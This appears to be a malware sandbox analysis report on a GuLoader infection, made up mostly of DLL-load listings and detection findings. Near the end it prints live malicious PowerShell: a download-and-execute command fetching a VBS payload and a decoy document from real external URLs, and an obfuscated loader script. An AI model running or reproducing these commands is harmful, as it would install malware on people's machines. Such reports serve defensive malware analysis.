                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cscapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Program Files\Windows Media Player\wmprph.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files\Windows Media Player\wmprph.exeSection loaded: mswsock.dll
                        Source: C:\Program Files\Windows Media Player\wmprph.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: rdc7di6ccs.LNK.13.drLNK file: ..\..\..\..\..\..\Public\rdc7di6ccs.docx
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeJump to behavior
                        Source: Binary string: m.Core.pdbc source: powershell.exe, 0000000B.00000002.2197252164.00000000075E0000.00000004.00000020.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        VBScript performs obfuscated calls to suspicious functions
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell").Run "powershell.exe -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx'", 0IWshShell3.Run("powershell.exe -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url", "0")
                        Yara detected GuLoader
                        Source: Yara matchFile source: 0000000B.00000002.2206780422.000000000C3AB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2206243160.0000000008870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2184442269.0000000005AA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1948506548.0000020190070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Found suspicious powershell code related to unpacking or dynamic code loading
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Frdigbygget)$glObal:FlJLsGRS = [sYsTEm.TExt.eNCOdING]::AsCiI.GeTsTRIng($EpocHE)$glObaL:BAttaLia=$FlJLsGRS.substRInG($VeLFUndErEDE,$aUTorIsERendeS)<#Aecidioform hollnderens Brutaliser
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Personifier $Tarentine $Patenthavere), (Ichthyized @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:varicoloreds = [AppDomain]::CurrentDomain.GetAssemblies(
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Filamentgarn252)), $Godsejernessandrous).DefineDynamicModule($Zoologiskes, $false).DefineType($Prototypevaerktoej, $Grunge, [System.Mu
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Frdigbygget)$glObal:FlJLsGRS = [sYsTEm.TExt.eNCOdING]::AsCiI.GeTsTRIng($EpocHE)$glObaL:BAttaLia=$FlJLsGRS.substRInG($VeLFUndErEDE,$aUTorIsERendeS)<#Aecidioform hollnderens Brutaliser
                        Suspicious powershell command line found
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx'Jump to behavior
